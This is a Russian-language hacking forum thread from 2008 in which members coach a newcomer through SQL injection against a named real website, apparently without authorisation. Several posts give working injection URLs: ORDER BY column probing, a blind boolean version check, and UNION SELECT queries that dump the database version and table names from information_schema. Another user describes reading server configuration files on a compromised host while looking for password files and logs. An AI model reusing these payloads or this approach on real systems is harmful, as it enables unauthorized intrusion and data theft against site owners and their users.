 |
|
16.06.2008, 00:02
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Сообщение от Constantine
Велемир в закладки куда-нибудь положи https://forum.antichat.ru/thread22832.html
Ппц пасип те за статью Ж))))))))))),оч помогла)).Встали терь такие вопросы.К моему удивлению,.bash_history файла не оказалось ни у кого из юзеров (.В конфиге,лежащему по пути etc/httpd/conf/httpd.conf,нашёл одну директиву - AccessFileName .htaccess.Походу не прочитать мне буит их(.По идее,такая же директива нужна для каждого файла?).тобишь должна быть строка ещё AccessFileName .hpasswd.Хм...Есть ещё какойто конфиг,лежащий по адресу
etc/httpd/conf/vhosts/Vhosts_ispconfig.conf.Тут много интересных директив,но про них в той статье не сказано было.Есть догадки...но что это конкретно за фаил кто-нибудь может пояснить ?)
Да,и вот ещё что. В директивах ErrorLog указаны пути до лог файлов.Некоторые пути дают ошибку,хотя всё верно вводил.Некоторые пустые,но существуют 100%)).*Настоящего* лог-файла с даными ещё не встречал).Такое ощущение, что отключен лог ошибок вапще,ибо пхп.ини не прочитать =_____=
Последний раз редактировалось Велемир; 16.06.2008 в 00:09..
|
|
|
16.06.2008, 00:15
|
|
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами:
9479722
Репутация:
-1
|
|
Помогите пожалуйста!
Есть такой сайт http://www.modvlad.ru
Как то на него залез и решил проверить на инъ...ю
нашел ссылку http://www.modvlad.ru/photo/?g=37
проверил http://www.modvlad.ru/photo/?g=37' выдало:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u65735/modvlad.ru/www/gallery/engine/gallery.php on line 39
попробовал обратиться к базе не выходит подскажите плиз кто знает что дальше делать??
|
|
|
|
16.06.2008, 00:23
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами:
10009826
Репутация:
435
|
|
читать статьи про sql inj...
вообще подбирай столбцы через ордер бай
|
|
|
|
16.06.2008, 00:37
|
|
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами:
9479722
Репутация:
-1
|
|
попробовал:
http://www.modvlad.ru/photo/?g=-1+order+by+100/*
и от 1 до 100
ни каких продвижений ошибка та же
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u65735/modvlad.ru/www/gallery/engine/gallery.php on line 39
что делать дальше??
Последний раз редактировалось JoN.SmiT; 16.06.2008 в 00:42..
|
|
|
|
16.06.2008, 00:44
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
полей 6, а скуля слепая
Код:
http://modvlad.ru/photo/?g=33+and+if(substring((select+version()),1,1)=5,1,0)
|
|
|
|
16.06.2008, 00:49
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://www.modvlad.ru/photo/?g=37+union+select+table_name,2,3,4,5,6+from+infor mation_schema.tables+limit+38,1/*
38 Таблиц.Проще поискать скрипт с выводом =_________=.У меня тоже такое было.
|
|
|
|
16.06.2008, 00:59
|
|
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами:
9479722
Репутация:
-1
|
|
А что мне делать со слипой скуляй?
и где взять скрипт с выводом если не секрет?
|
|
|
|
16.06.2008, 01:00
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
Не слепая!!!!
Открой исходный код страницы и поищи поля 3,4,5,6. Вывод в них
Вот пример
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/*
ищем в коде 444, и рядом видим версию 5.0.45-log
|
|
|
|
16.06.2008, 01:08
|
|
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами:
9479722
Репутация:
-1
|
|
ага нашел! А как теперь сформировать запрос на вывод таблицы?
|
|
|
|
16.06.2008, 01:10
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами:
10485026
Репутация:
1879
|
|
Запрос из базы только Лимитом(!!!) Попробовал вывести всё... опера всю оперативу скушала...
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
